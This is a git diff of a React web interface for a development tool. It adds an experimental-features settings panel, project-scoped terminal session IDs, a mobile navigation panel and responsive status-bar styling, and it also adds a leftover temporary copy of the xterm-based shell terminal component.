+      setSaveError(err instanceof Error ? err.message : String(err))
+    } finally {
+      setSaving((s) => ({ ...s, [flagKey]: false }))
+    }
+  }
+
+  return (
+    <div className="space-y-4" data-testid="settings-experimental">
+      <SettingsHeader
+        title="Experimental"
+        icon={<FlaskConical className="h-3.5 w-3.5" />}
+        subtitle="Opt-in features — may change without notice"
+        onRefresh={refresh}
+        refreshing={busy}
+      />
+
+      {state.error && <SettingsError message={state.error} />}
+      {saveError && <SettingsError message={saveError} />}
+      {busy && !data && <SettingsLoading label="Loading preferences…" />}
+
+      <div className="space-y-3">
+        {EXPERIMENTAL_FLAGS.map((flag) => {
+          const enabled = flags[flag.key] ?? false
+          const isSaving = saving[flag.key] ?? false
+
+          return (
+            <div
+              key={flag.key}
+              className="rounded-lg border border-border/50 bg-card/50 px-3 py-3 space-y-2"
+            >
+              <div className="flex items-start justify-between gap-3">
+                <div className="min-w-0 flex-1 space-y-1">
+                  <div className="flex items-center gap-2">
+                    <span className="text-xs font-medium text-foreground">{flag.label}</span>
+                    <span
+                      className={cn(
+                        "rounded-full px-1.5 py-0.5 text-[10px] font-medium",
+                        enabled
+                          ? "bg-success/10 text-success"
+                          : "bg-muted text-muted-foreground",
+                      )}
+                    >
+                      {enabled ? "on" : "off"}
+                    </span>
+                  </div>
+                  <p className="text-[11px] text-muted-foreground leading-relaxed">
+                    {flag.description}
+                  </p>
+                  {flag.warning && (
+                    <div className="flex items-center gap-1 text-[10px] text-warning">
+                      <AlertTriangle className="h-3 w-3 shrink-0" />
+                      <span>{flag.warning}</span>
+                    </div>
+                  )}
+                </div>
+                <button
+                  onClick={() => toggle(flag.key, !enabled)}
+                  disabled={isSaving || busy || !data}
+                  className={cn(
+                    "shrink-0 relative inline-flex h-5 w-9 items-center rounded-full transition-colors focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring disabled:opacity-50 disabled:cursor-not-allowed",
+                    enabled ? "bg-success" : "bg-muted-foreground/30",
+                  )}
+                  role="switch"
+                  aria-checked={enabled}
+                  aria-label={`Toggle ${flag.label}`}
+                >
+                  <span
+                    className={cn(
+                      "inline-block h-3.5 w-3.5 rounded-full bg-white shadow-sm transition-transform",
+                      enabled ? "translate-x-4" : "translate-x-0.5",
+                    )}
+                  />
+                  {isSaving && (
+                    <span className="absolute inset-0 flex items-center justify-center">
+                      <LoaderCircle className="h-3 w-3 animate-spin text-white" />
+                    </span>
+                  )}
+                </button>
+              </div>
+            </div>
+          )
+        })}
+      </div>
+
+      {data && (
+        <p className="text-[11px] text-muted-foreground">
+          Changes are written to{" "}
+          <span className="font-mono">{prefs?.path ?? "~/.gsd/PREFERENCES.md"}</span>
+          {" "}and take effect on the next session.
+        </p>
+      )}
+    </div>
+  )
+}
+
+// ═══════════════════════════════════════════════════════════════════════
+// LEGACY EXPORTS
+// ═══════════════════════════════════════════════════════════════════════
+
 // Legacy exports for backward compatibility with gsd-prefs mega-scroll
 export const TerminalSizePanel = GeneralPanel
 export const EditorSizePanel = () => null
diff --git a/web/components/gsd/shell-terminal.tsx b/web/components/gsd/shell-terminal.tsx
index 637f4b60e..c60b92ceb 100644
--- a/web/components/gsd/shell-terminal.tsx
+++ b/web/components/gsd/shell-terminal.tsx
@@ -8,6 +8,7 @@ import { validateImageFile } from "@/lib/image-utils"
 import { filterInitialGsdHeader } from "@/lib/initial-gsd-header-filter"
 import { buildProjectAbsoluteUrl, buildProjectPath } from "@/lib/project-url"
 import { authFetch, appendAuthParam } from "@/lib/auth"
+import { getXtermOptions, getXtermTheme } from "@/lib/xterm-theme"
 import "@xterm/xterm/css/xterm.css"
 
 type XTerminal = import("@xterm/xterm").Terminal
@@ -37,78 +38,6 @@ interface ShellTerminalProps {
   projectCwd?: string
 }
 
-// ─── xterm themes ─────────────────────────────────────────────────────────────
-
-const XTERM_DARK_THEME = {
-  background: "#0a0a0a",
-  foreground: "#e4e4e7",
-  cursor: "#e4e4e7",
-  cursorAccent: "#0a0a0a",
-  selectionBackground: "#27272a",
-  selectionForeground: "#e4e4e7",
-  black: "#18181b",
-  red: "#ef4444",
-  green: "#22c55e",
-  yellow: "#eab308",
-  blue: "#3b82f6",
-  magenta: "#a855f7",
-  cyan: "#06b6d4",
-  white: "#e4e4e7",
-  brightBlack: "#52525b",
-  brightRed: "#f87171",
-  brightGreen: "#4ade80",
-  brightYellow: "#facc15",
-  brightBlue: "#60a5fa",
-  brightMagenta: "#c084fc",
-  brightCyan: "#22d3ee",
-  brightWhite: "#fafafa",
-} as const
-
-const XTERM_LIGHT_THEME = {
-  background: "#f5f5f5",
-  foreground: "#1a1a1a",
-  cursor: "#1a1a1a",
-  cursorAccent: "#f5f5f5",
-  selectionBackground: "#d4d4d8",
-  selectionForeground: "#1a1a1a",
-  black: "#1a1a1a",
-  red: "#dc2626",
-  green: "#16a34a",
-  yellow: "#ca8a04",
-  blue: "#2563eb",
-  magenta: "#9333ea",
-  cyan: "#0891b2",
-  white: "#e4e4e7",
-  brightBlack: "#71717a",
-  brightRed: "#ef4444",
-  brightGreen: "#22c55e",
-  brightYellow: "#eab308",
-  brightBlue: "#3b82f6",
-  brightMagenta: "#a855f7",
-  brightCyan: "#06b6d4",
-  brightWhite: "#fafafa",
-} as const
-
-function getXtermTheme(isDark: boolean) {
-  return isDark ? XTERM_DARK_THEME : XTERM_LIGHT_THEME
-}
-
-function getXtermOptions(isDark: boolean, fontSize?: number) {
-  return {
-    cursorBlink: true,
-    cursorStyle: "bar" as const,
-    fontSize: fontSize ?? 13,
-    fontFamily:
-      "'SF Mono', 'Cascadia Code', 'Fira Code', Menlo, Monaco, 'Courier New', monospace",
-    lineHeight: 1.35,
-    letterSpacing: 0,
-    theme: getXtermTheme(isDark),
-    allowProposedApi: true,
-    scrollback: 10000,
-    convertEol: false,
-  }
-}
-
 function getRenderableTerminalSize(container: HTMLDivElement | null, terminal: XTerminal | null): { cols: number; rows: number } | null {
   if (!container || !terminal) return null
 
@@ -536,6 +465,23 @@ async function uploadAndInjectImage(file: File, sessionId: string, projectCwd?:
 
 // ─── Multi-instance terminal panel ────────────────────────────────────────────
 
+/**
+ * Derive a session ID that is scoped to the project path.  This ensures
+ * that switching projects creates a separate PTY session per project, and
+ * switching back reconnects to the *same* server-side PTY instead of
+ * spawning a new one (the server's getOrCreateSession returns the existing
+ * live session when the ID matches).
+ */
+function deriveProjectScopedSessionId(
+  projectCwd: string | undefined,
+  sessionPrefix?: string,
+  command?: string,
+): string {
+  const base = sessionPrefix ?? (command ? "gsd-default" : "default")
+  if (!projectCwd) return base
+  return `${base}:${projectCwd}`
+}
+
 export function ShellTerminal({
   className,
   command,
@@ -548,7 +494,7 @@ export function ShellTerminal({
 }: ShellTerminalProps) {
   const { resolvedTheme } = useTheme()
   const isDark = resolvedTheme !== "light"
-  const defaultId = sessionPrefix ?? (command ? "gsd-default" : "default")
+  const defaultId = deriveProjectScopedSessionId(projectCwd, sessionPrefix, command)
   const commandLabel = deriveCommandLabel(command)
   const [tabs, setTabs] = useState<TerminalTab[]>([
     { id: defaultId, label: commandLabel, connected: false },
@@ -557,6 +503,19 @@ export function ShellTerminal({
   const [isDragOver, setIsDragOver] = useState(false)
   const terminalAreaRef = useRef<HTMLDivElement>(null)
 
+  // When the project changes, the defaultId changes.  Reset tabs so the
+  // terminal reconnects to the project-scoped PTY session on the server.
+  // The server's getOrCreateSession will return the existing live session
+  // when the session ID matches, preserving terminal state.
+  const prevDefaultIdRef = useRef(defaultId)
+  useEffect(() => {
+    if (prevDefaultIdRef.current !== defaultId) {
+      prevDefaultIdRef.current = defaultId
+      setTabs([{ id: defaultId, label: commandLabel, connected: false }])
+      setActiveTabId(defaultId)
+    }
+  }, [defaultId, commandLabel])
+
   // ── Drag-and-drop handlers (native DOM, capture phase) ──────────────────
   // React synthetic events don't reliably fire through xterm's internal DOM.
   // Native capture-phase listeners intercept before xterm can swallow them —
@@ -711,7 +670,7 @@ export function ShellTerminal({
 
         {/* Drop overlay */}
         {isDragOver && (
-          <div className="absolute inset-0 z-20 flex flex-col items-center justify-center gap-2 bg-background/80 backdrop-blur-sm border-2 border-dashed border-primary rounded-md pointer-events-none">
+          <div className="absolute inset-0 z-20 flex flex-col items-center justify-center gap-2 bg-background backdrop-blur-sm border-2 border-dashed border-primary rounded-md pointer-events-none">
             <ImagePlus className="h-8 w-8 text-primary" />
             <span className="text-sm font-medium text-primary">Drop image here</span>
           </div>
@@ -719,7 +678,7 @@ export function ShellTerminal({
       </div>
 
       {!hideSidebar && (
-        <div className="flex w-[34px] flex-shrink-0 flex-col border-l border-border/40 bg-terminal">
+        <div className="flex w-[34px] flex-shrink-0 flex-col border-l border-border/50 bg-terminal">
           {/* New terminal button */}
           <button
             onClick={createTab}
@@ -729,7 +688,7 @@ export function ShellTerminal({
             <Plus className="h-3 w-3" />
           </button>
 
-          <div className="h-px bg-border/40" />
+          <div className="h-px bg-border/50" />
 
           {/* Tab list */}
           <div className="flex-1 overflow-y-auto">
diff --git a/web/components/gsd/sidebar.tsx b/web/components/gsd/sidebar.tsx
index 07ed98802..2a37c494d 100644
--- a/web/components/gsd/sidebar.tsx
+++ b/web/components/gsd/sidebar.tsx
@@ -62,7 +62,7 @@ const StatusIcon = ({ status }: { status: ItemStatus }) => {
   if (status === "in-progress") {
     return <Play className="h-4 w-4 shrink-0 text-warning" />
   }
-  return <Circle className="h-4 w-4 shrink-0 text-muted-foreground/50" />
+  return <Circle className="h-4 w-4 shrink-0 text-muted-foreground" />
 }
 
 /* ─── Nav Rail (left icon bar) ─── */
@@ -110,7 +110,7 @@ export function NavRail({ activeView, onViewChange, isConnecting = false }: NavR
           className={cn(
             "flex h-10 w-10 items-center justify-center rounded-md transition-colors",
             isConnecting
-              ? "cursor-not-allowed text-muted-foreground/30"
+              ? "cursor-not-allowed text-muted-foreground/50"
               : activeView === item.id
                 ? "bg-accent text-foreground"
                 : "text-muted-foreground hover:bg-accent/50 hover:text-foreground",
@@ -127,7 +127,7 @@ export function NavRail({ activeView, onViewChange, isConnecting = false }: NavR
           className={cn(
             "flex h-10 w-10 items-center justify-center rounded-md transition-colors",
             isConnecting
-              ? "cursor-not-allowed text-muted-foreground/30"
+              ? "cursor-not-allowed text-muted-foreground/50"
               : "text-muted-foreground hover:bg-accent/50 hover:text-foreground",
           )}
           title={isConnecting ? "Connecting…" : "Projects"}
@@ -698,12 +698,101 @@ interface SidebarProps {
   activeView: string
   onViewChange: (view: string) => void
   isConnecting?: boolean
+  mobile?: boolean
 }
 
-export function Sidebar({ activeView, onViewChange, isConnecting = false }: SidebarProps) {
+export function Sidebar({ activeView, onViewChange, isConnecting = false, mobile = false }: SidebarProps) {
+  if (mobile) {
+    return <MobileNavPanel activeView={activeView} onViewChange={onViewChange} isConnecting={isConnecting} />
+  }
   return (
     <div className="flex h-full">
       <NavRail activeView={activeView} onViewChange={onViewChange} isConnecting={isConnecting} />
     </div>
   )
 }
+
+/* ─── Mobile Nav Panel (full-width labels for touch) ─── */
+
+function MobileNavPanel({ activeView, onViewChange, isConnecting = false }: NavRailProps) {
+  const { openCommandSurface } = useGSDWorkspaceActions()
+  const { theme, setTheme } = useTheme()
+
+  const cycleTheme = () => {
+    if (theme === "system") setTheme("light")
+    else if (theme === "light") setTheme("dark")
+    else setTheme("system")
+  }
+
+  const themeLabel = theme === "light" ? "Light" : theme === "dark" ? "Dark" : "System"
+  const ThemeIcon = theme === "light" ? Sun : theme === "dark" ? Moon : Monitor
+
+  const navItems = [
+    { id: "dashboard", label: "Dashboard", icon: LayoutDashboard },
+    { id: "power", label: "Power Mode", icon: Columns2 },
+    { id: "chat", label: "Chat", icon: MessagesSquare },
+    { id: "roadmap", label: "Roadmap", icon: MapIcon },
+    { id: "files", label: "Files", icon: Folder },
+    { id: "activity", label: "Activity", icon: Activity },
+    { id: "visualize", label: "Visualize", icon: BarChart3 },
+  ]
+
+  return (
+    <div className="flex h-full flex-col bg-sidebar pt-14" data-testid="mobile-nav-panel">
+      <div className="flex-1 overflow-y-auto px-2 py-2">
+        {navItems.map((item) => (
+          <button
+            key={item.id}
+            onClick={() => onViewChange(item.id)}
+            disabled={isConnecting}
+            className={cn(
+              "flex w-full items-center gap-3 rounded-md px-3 py-3 text-sm font-medium transition-colors min-h-[44px]",
+              isConnecting
+                ? "cursor-not-allowed text-muted-foreground/50"
+                : activeView === item.id
+                  ? "bg-accent text-foreground"
+                  : "text-muted-foreground hover:bg-accent/50 hover:text-foreground",
+            )}
+          >
+            <item.icon className="h-5 w-5 shrink-0" />
+            {item.label}
+          </button>
+        ))}
+      </div>
+      <div className="border-t border-border px-2 py-2 space-y-1">
+        <button
+          onClick={() => window.dispatchEvent(new CustomEvent("gsd:open-projects"))}
+          disabled={isConnecting}
+          className="flex w-full items-center gap-3 rounded-md px-3 py-3 text-sm text-muted-foreground hover:bg-accent/50 hover:text-foreground transition-colors min-h-[44px]"
+        >
+          <FolderKanban className="h-5 w-5 shrink-0" />
+          Projects
+        </button>
+        <button
+          onClick={() => !isConnecting && openCommandSurface("git", { source: "sidebar" })}
+          disabled={isConnecting}
+          className="flex w-full items-center gap-3 rounded-md px-3 py-3 text-sm text-muted-foreground hover:bg-accent/50 hover:text-foreground transition-colors min-h-[44px]"
+        >
+          <GitBranch className="h-5 w-5 shrink-0" />
+          Git
+        </button>
+        <button
+          onClick={() => !isConnecting && openCommandSurface("settings", { source: "sidebar" })}
+          disabled={isConnecting}
+          className="flex w-full items-center gap-3 rounded-md px-3 py-3 text-sm text-muted-foreground hover:bg-accent/50 hover:text-foreground transition-colors min-h-[44px]"
+        >
+          <Settings className="h-5 w-5 shrink-0" />
+          Settings
+        </button>
+        <button
+          onClick={() => !isConnecting && cycleTheme()}
+          disabled={isConnecting}
+          className="flex w-full items-center gap-3 rounded-md px-3 py-3 text-sm text-muted-foreground hover:bg-accent/50 hover:text-foreground transition-colors min-h-[44px]"
+        >
+          <ThemeIcon className="h-5 w-5 shrink-0" />
+          Theme: {themeLabel}
+        </button>
+      </div>
+    </div>
+  )
+}
diff --git a/web/components/gsd/status-bar.tsx b/web/components/gsd/status-bar.tsx
index 4a239a56d..04786e887 100644
--- a/web/components/gsd/status-bar.tsx
+++ b/web/components/gsd/status-bar.tsx
@@ -83,13 +83,13 @@ export function StatusBar() {
   }, [fetchProjectTotals])
 
   return (
-    <div className="flex h-7 items-center justify-between border-t border-border bg-card px-3 text-xs">
-      <div className="flex min-w-0 items-center gap-4">
+    <div className="flex h-7 items-center justify-between border-t border-border bg-card px-2 md:px-3 text-[10px] md:text-xs">
+      <div className="flex min-w-0 items-center gap-2 md:gap-4">
         <div className={`flex items-center gap-1.5 ${toneClass(status.tone)}`}>
           <Wifi className="h-3 w-3" />
           <span>{status.label}</span>
         </div>
-        <div className="flex items-center gap-1.5 text-muted-foreground">
+        <div className="hidden sm:flex items-center gap-1.5 text-muted-foreground">
           <GitBranch className="h-3 w-3" />
           {isConnecting ? (
             <Skeleton className="h-3 w-20" />
@@ -97,7 +97,7 @@ export function StatusBar() {
             <span className="font-mono">{branch}</span>
           )}
         </div>
-        <div className="flex items-center gap-1.5 text-muted-foreground">
+        <div className="hidden lg:flex items-center gap-1.5 text-muted-foreground">
           <Cpu className="h-3 w-3" />
           {isConnecting ? (
             <Skeleton className="h-3 w-24" />
@@ -141,12 +141,12 @@ export function StatusBar() {
           </div>
         )}
       </div>
-      <div className="flex min-w-0 items-center gap-4">
-        <div className="flex items-center gap-1.5 text-muted-foreground">
+      <div className="flex min-w-0 items-center gap-2 md:gap-4">
+        <div className="hidden sm:flex items-center gap-1.5 text-muted-foreground">
           <Clock className="h-3 w-3" />
           {isConnecting ? <Skeleton className="h-3 w-8" /> : <span>{formatProjectDuration(projectTotals?.duration ?? auto?.elapsed ?? 0)}</span>}
         </div>
-        <div className="flex items-center gap-1.5 text-muted-foreground">
+        <div className="hidden sm:flex items-center gap-1.5 text-muted-foreground">
           <Zap className="h-3 w-3" />
           {isConnecting ? <Skeleton className="h-3 w-6" /> : <span>{formatTokenCount(projectTotals?.tokens.total ?? auto?.totalTokens ?? 0)}</span>}
         </div>
@@ -154,7 +154,7 @@ export function StatusBar() {
           <DollarSign className="h-3 w-3" />
           {isConnecting ? <Skeleton className="h-3 w-10" /> : <span>{formatProjectCost(projectTotals?.cost ?? auto?.totalCost ?? 0)}</span>}
         </div>
-        <span className="max-w-[20rem] truncate text-muted-foreground" data-testid="status-bar-unit">
+        <span className="hidden sm:inline max-w-[20rem] truncate text-muted-foreground" data-testid="status-bar-unit">
           {isConnecting ? <Skeleton className="inline-block h-3 w-28 align-middle" /> : <ScopeBadgeInline label={unitLabel} />}
         </span>
       </div>
diff --git a/web/components/gsd/tempCodeRunnerFile.tsx b/web/components/gsd/tempCodeRunnerFile.tsx
new file mode 100644
index 000000000..637f4b60e
--- /dev/null
+++ b/web/components/gsd/tempCodeRunnerFile.tsx
@@ -0,0 +1,784 @@
+"use client"
+
+import { useEffect, useRef, useCallback, useState } from "react"
+import { useTheme } from "next-themes"
+import { Plus, X, TerminalSquare, Loader2, ImagePlus } from "lucide-react"
+import { cn } from "@/lib/utils"
+import { validateImageFile } from "@/lib/image-utils"
+import { filterInitialGsdHeader } from "@/lib/initial-gsd-header-filter"
+import { buildProjectAbsoluteUrl, buildProjectPath } from "@/lib/project-url"
+import { authFetch, appendAuthParam } from "@/lib/auth"
+import "@xterm/xterm/css/xterm.css"
+
+type XTerminal = import("@xterm/xterm").Terminal
+type XFitAddon = import("@xterm/addon-fit").FitAddon
+
+const MIN_TERMINAL_ATTACH_WIDTH = 180
+const MIN_TERMINAL_ATTACH_HEIGHT = 120
+const MIN_TERMINAL_ATTACH_COLS = 20
+const MIN_TERMINAL_ATTACH_ROWS = 8
+
+// ─── Types ────────────────────────────────────────────────────────────────────
+
+interface TerminalTab {
+  id: string
+  label: string
+  connected: boolean
+}
+
+interface ShellTerminalProps {
+  className?: string
+  command?: string
+  commandArgs?: string[]
+  sessionPrefix?: string
+  hideSidebar?: boolean
+  fontSize?: number
+  hideInitialGsdHeader?: boolean
+  projectCwd?: string
+}
+
+// ─── xterm themes ─────────────────────────────────────────────────────────────
+
+const XTERM_DARK_THEME = {
+  background: "#0a0a0a",
+  foreground: "#e4e4e7",
+  cursor: "#e4e4e7",
+  cursorAccent: "#0a0a0a",
+  selectionBackground: "#27272a",
+  selectionForeground: "#e4e4e7",
+  black: "#18181b",
+  red: "#ef4444",
+  green: "#22c55e",
+  yellow: "#eab308",
+  blue: "#3b82f6",
+  magenta: "#a855f7",
+  cyan: "#06b6d4",
+  white: "#e4e4e7",
+  brightBlack: "#52525b",
+  brightRed: "#f87171",
+  brightGreen: "#4ade80",
+  brightYellow: "#facc15",
+  brightBlue: "#60a5fa",
+  brightMagenta: "#c084fc",
+  brightCyan: "#22d3ee",
+  brightWhite: "#fafafa",
+} as const
+
+const XTERM_LIGHT_THEME = {
+  background: "#f5f5f5",
+  foreground: "#1a1a1a",
+  cursor: "#1a1a1a",
+  cursorAccent: "#f5f5f5",
+  selectionBackground: "#d4d4d8",
+  selectionForeground: "#1a1a1a",
+  black: "#1a1a1a",
+  red: "#dc2626",
+  green: "#16a34a",
+  yellow: "#ca8a04",
+  blue: "#2563eb",
+  magenta: "#9333ea",
+  cyan: "#0891b2",
+  white: "#e4e4e7",
+  brightBlack: "#71717a",
+  brightRed: "#ef4444",
+  brightGreen: "#22c55e",
+  brightYellow: "#eab308",
+  brightBlue: "#3b82f6",
+  brightMagenta: "#a855f7",
+  brightCyan: "#06b6d4",
+  brightWhite: "#fafafa",
+} as const
+
+function getXtermTheme(isDark: boolean) {
+  return isDark ? XTERM_DARK_THEME : XTERM_LIGHT_THEME
+}
+
+function getXtermOptions(isDark: boolean, fontSize?: number) {
+  return {
+    cursorBlink: true,
+    cursorStyle: "bar" as const,
+    fontSize: fontSize ?? 13,
+    fontFamily:
+      "'SF Mono', 'Cascadia Code', 'Fira Code', Menlo, Monaco, 'Courier New', monospace",
+    lineHeight: 1.35,
+    letterSpacing: 0,
+    theme: getXtermTheme(isDark),
+    allowProposedApi: true,
+    scrollback: 10000,
+    convertEol: false,
+  }
+}
+
+function getRenderableTerminalSize(container: HTMLDivElement | null, terminal: XTerminal | null): { cols: number; rows: number } | null {
+  if (!container || !terminal) return null
+
+  const rect = container.getBoundingClientRect()
+  if (rect.width < MIN_TERMINAL_ATTACH_WIDTH || rect.height < MIN_TERMINAL_ATTACH_HEIGHT) {
+    return null
+  }
+
+  if (terminal.cols < MIN_TERMINAL_ATTACH_COLS || terminal.rows < MIN_TERMINAL_ATTACH_ROWS) {
+    return null
+  }
+
+  return { cols: terminal.cols, rows: terminal.rows }
+}
+
+async function settleTerminalLayout(
+  container: HTMLDivElement | null,
+  terminal: XTerminal | null,
+  fitAddon: XFitAddon | null,
+  isDisposed: () => boolean,
+): Promise<{ cols: number; rows: number } | null> {
+  if (typeof document !== "undefined" && "fonts" in document) {
+    try {
+      await Promise.race([
+        document.fonts.ready,
+        new Promise<void>((resolve) => setTimeout(resolve, 1000)),
+      ])
+    } catch {
+      // Ignore font loading failures and fall through to repeated fit attempts.
+    }
+  }
+
+  for (let attempt = 0; attempt < 12; attempt++) {
+    if (isDisposed()) return null
+
+    await new Promise<void>((resolve) => {
+      requestAnimationFrame(() => resolve())
+    })
+
+    if (isDisposed()) return null
+
+    try {
+      fitAddon?.fit()
+    } catch {
+      /* hidden or detached */
+    }
+
+    const size = getRenderableTerminalSize(container, terminal)
+    if (size) {
+      return size
+    }
+
+    await new Promise((resolve) => setTimeout(resolve, 50))
+  }
+
+  return getRenderableTerminalSize(container, terminal)
+}
+
+function deriveCommandLabel(command?: string): string {
+  if (!command?.trim()) return "zsh"
+  const token = command.trim().split(/\s+/)[0] || command
+  const normalized = token.replace(/\\/g, "/")
+  const parts = normalized.split("/")
+  return parts[parts.length - 1] || token
+}
+
+// ─── Single terminal instance (internal) ──────────────────────────────────────
+
+interface TerminalInstanceProps {
+  sessionId: string
+  visible: boolean
+  command?: string
+  commandArgs?: string[]
+  isDark: boolean
+  fontSize?: number
+  hideInitialGsdHeader?: boolean
+  projectCwd?: string
+  onConnectionChange: (connected: boolean) => void
+}
+
+function TerminalInstance({
+  sessionId,
+  visible,
+  command,
+  commandArgs,
+  isDark,
+  fontSize,
+  hideInitialGsdHeader = false,
+  projectCwd,
+  onConnectionChange,
+}: TerminalInstanceProps) {
+  const containerRef = useRef<HTMLDivElement>(null)
+  const termRef = useRef<XTerminal | null>(null)
+  const fitAddonRef = useRef<XFitAddon | null>(null)
+  const eventSourceRef = useRef<EventSource | null>(null)
+  const inputQueueRef = useRef<string[]>([])
+  const flushingRef = useRef(false)
+  const resizeTimeoutRef = useRef<ReturnType<typeof setTimeout> | null>(null)
+  const onConnectionChangeRef = useRef(onConnectionChange)
+  const initialHeaderSettledRef = useRef(!hideInitialGsdHeader)
+  const initialHeaderBufferRef = useRef("")
+  const commandArgsKey = (commandArgs ?? []).join("\u0000")
+  const [hasOutput, setHasOutput] = useState(false)
+
+  const sendResize = useCallback(
+    (cols: number, rows: number) => {
+      if (resizeTimeoutRef.current) clearTimeout(resizeTimeoutRef.current)
+      resizeTimeoutRef.current = setTimeout(() => {
+        void authFetch(buildProjectPath("/api/terminal/resize", projectCwd), {
+          method: "POST",
+          headers: { "Content-Type": "application/json" },
+          body: JSON.stringify({ id: sessionId, cols, rows }),
+        })
+      }, 100)
+    },
+    [projectCwd, sessionId],
+  )
+
+  const flushInputQueue = useCallback(async () => {
+    if (flushingRef.current) return
+    flushingRef.current = true
+    while (inputQueueRef.current.length > 0) {
+      const data = inputQueueRef.current.shift()!
+      try {
+        await authFetch(buildProjectPath("/api/terminal/input", projectCwd), {
+          method: "POST",
+          headers: { "Content-Type": "application/json" },
+          body: JSON.stringify({ id: sessionId, data }),
+        })
+      } catch {
+        inputQueueRef.current.unshift(data)
+        break
+      }
+    }
+    flushingRef.current = false
+  }, [projectCwd, sessionId])
+
+  const sendInput = useCallback(
+    (data: string) => {
+      inputQueueRef.current.push(data)
+      void flushInputQueue()
+    },
+    [flushInputQueue],
+  )
+
+  useEffect(() => {
+    onConnectionChangeRef.current = onConnectionChange
+  }, [onConnectionChange])
+
+  useEffect(() => {
+    initialHeaderSettledRef.current = !hideInitialGsdHeader
+    initialHeaderBufferRef.current = ""
+  }, [hideInitialGsdHeader, sessionId])
+
+  // Update xterm theme when isDark changes
+  useEffect(() => {
+    if (termRef.current) {
+      termRef.current.options.theme = getXtermTheme(isDark)
+    }
+  }, [isDark])
+
+  // Update xterm font size when fontSize changes
+  useEffect(() => {
+    if (termRef.current) {
+      termRef.current.options.fontSize = fontSize ?? 13
+      try {
+        fitAddonRef.current?.fit()
+        if (termRef.current) {
+          sendResize(termRef.current.cols, termRef.current.rows)
+        }
+      } catch {
+        /* not visible yet */
+      }
+    }
+  }, [fontSize, sendResize])
+
+  // Re-fit when visibility changes
+  useEffect(() => {
+    if (visible && fitAddonRef.current && termRef.current) {
+      // Small delay to let the DOM settle
+      const t = setTimeout(() => {
+        try {
+          fitAddonRef.current?.fit()
+          if (termRef.current) {
+            sendResize(termRef.current.cols, termRef.current.rows)
+          }
+        } catch {
+          /* not visible yet */
+        }
+      }, 50)
+      return () => clearTimeout(t)
+    }
+  }, [visible, sendResize])
+
+  useEffect(() => {
+    if (!containerRef.current) return
+
+    let disposed = false
+    let terminal: XTerminal | null = null
+    let fitAddon: XFitAddon | null = null
+    let resizeObserver: ResizeObserver | null = null
+
+    const init = async () => {
+      const [{ Terminal }, { FitAddon }] = await Promise.all([
+        import("@xterm/xterm"),
+        import("@xterm/addon-fit"),
+      ])
+
+      if (disposed) return
+
+      terminal = new Terminal(getXtermOptions(isDark, fontSize))
+      fitAddon = new FitAddon()
+      terminal.loadAddon(fitAddon)
+      terminal.open(containerRef.current!)
+
+      termRef.current = terminal
+      fitAddonRef.current = fitAddon
+
+      await settleTerminalLayout(containerRef.current, terminal, fitAddon, () => disposed)
+      if (disposed) return
+
+      terminal.onData((data) => sendInput(data))
+      terminal.onBinary((data) => sendInput(data))
+
+      // SSE stream
+      const streamUrl = buildProjectAbsoluteUrl(
+        "/api/terminal/stream",
+        window.location.origin,
+        projectCwd,
+      )
+      streamUrl.searchParams.set("id", sessionId)
+      if (command) streamUrl.searchParams.set("command", command)
+      for (const arg of commandArgs ?? []) {
+        streamUrl.searchParams.append("arg", arg)
+      }
+      const es = new EventSource(appendAuthParam(streamUrl.toString()))
+      eventSourceRef.current = es
+
+      es.onmessage = (event) => {
+        try {
+          const msg = JSON.parse(event.data) as {
+            type: string
+            data?: string
+          }
+          if (msg.type === "connected") {
+            onConnectionChangeRef.current(true)
+            void settleTerminalLayout(containerRef.current, terminal, fitAddon, () => disposed).then((size) => {
+              if (!size) return
+              sendResize(size.cols, size.rows)
+            })
+          } else if (msg.type === "output" && msg.data) {
+            let output = msg.data
+
+            if (hideInitialGsdHeader && !initialHeaderSettledRef.current) {
+              initialHeaderBufferRef.current += output
+              const filtered = filterInitialGsdHeader(initialHeaderBufferRef.current)
+
+              if (filtered.status === "needs-more") {
+                return
+              }
+
+              initialHeaderSettledRef.current = true
+              initialHeaderBufferRef.current = ""
+              output = filtered.text
+            }
+
+            if (output) {
+              terminal?.write(output)
+              setHasOutput(true)
+            }
+          }
+        } catch {
+          /* malformed */
+        }
+      }
+
+      es.onerror = () => onConnectionChangeRef.current(false)
+
+      // Resize observer
+      resizeObserver = new ResizeObserver(() => {
+        if (disposed) return
+        try {
+          fitAddon?.fit()
+          if (terminal) sendResize(terminal.cols, terminal.rows)
+        } catch {
+          /* not visible */
+        }
+      })
+      resizeObserver.observe(containerRef.current!)
+    }
+
+    void init()
+
+    return () => {
+      disposed = true
+      if (resizeTimeoutRef.current) clearTimeout(resizeTimeoutRef.current)
+      eventSourceRef.current?.close()
+      eventSourceRef.current = null
+      resizeObserver?.disconnect()
+      terminal?.dispose()
+      termRef.current = null
+      fitAddonRef.current = null
+    }
+  }, [sessionId, command, commandArgs, commandArgsKey, fontSize, hideInitialGsdHeader, isDark, projectCwd, sendInput, sendResize])
+
+  // Focus on click
+  const wrapperRef = useRef<HTMLDivElement>(null)
+  const handleClick = useCallback(() => {
+    termRef.current?.focus()
+  }, [])
+
+  // Shift+Enter → newline (native DOM, capture phase)
+  // xterm.js sends \r for both Enter and Shift+Enter. The pi TUI editor
+  // recognizes \n (LF) as "insert newline".
+  useEffect(() => {
+    const el = wrapperRef.current
+    if (!el) return
+
+    const onKeyDown = (e: KeyboardEvent) => {
+      if (e.key === "Enter" && e.shiftKey && !e.ctrlKey && !e.altKey && !e.metaKey) {
+        e.preventDefault()
+        e.stopPropagation()
+        sendInput("\n")
+      }
+    }
+
+    el.addEventListener("keydown", onKeyDown, true)
+    return () => el.removeEventListener("keydown", onKeyDown, true)
+  }, [sendInput])
+
+  // Auto-focus when this tab becomes visible
+  useEffect(() => {
+    if (visible) {
+      // Small delay to let layout settle
+      const t = setTimeout(() => termRef.current?.focus(), 80)
+      return () => clearTimeout(t)
+    }
+  }, [visible])
+
+  return (
+    <div
+      ref={wrapperRef}
+      className={cn("relative h-full w-full bg-terminal", !visible && "hidden")}
+      onClick={handleClick}
+    >
+      {/* Loading overlay — visible until first output arrives */}
+      {!hasOutput && (
+        <div className="absolute inset-0 z-10 flex flex-col items-center justify-center gap-3 bg-terminal">
+          <Loader2 className="h-5 w-5 animate-spin text-muted-foreground" />
+          <span className="text-xs text-muted-foreground">
+            {command ? "Starting GSD…" : "Connecting…"}
+          </span>
+        </div>
+      )}
+      <div
+        ref={containerRef}
+        className="h-full w-full"
+        style={{ padding: "8px 4px 4px 8px" }}
+      />
+    </div>
+  )
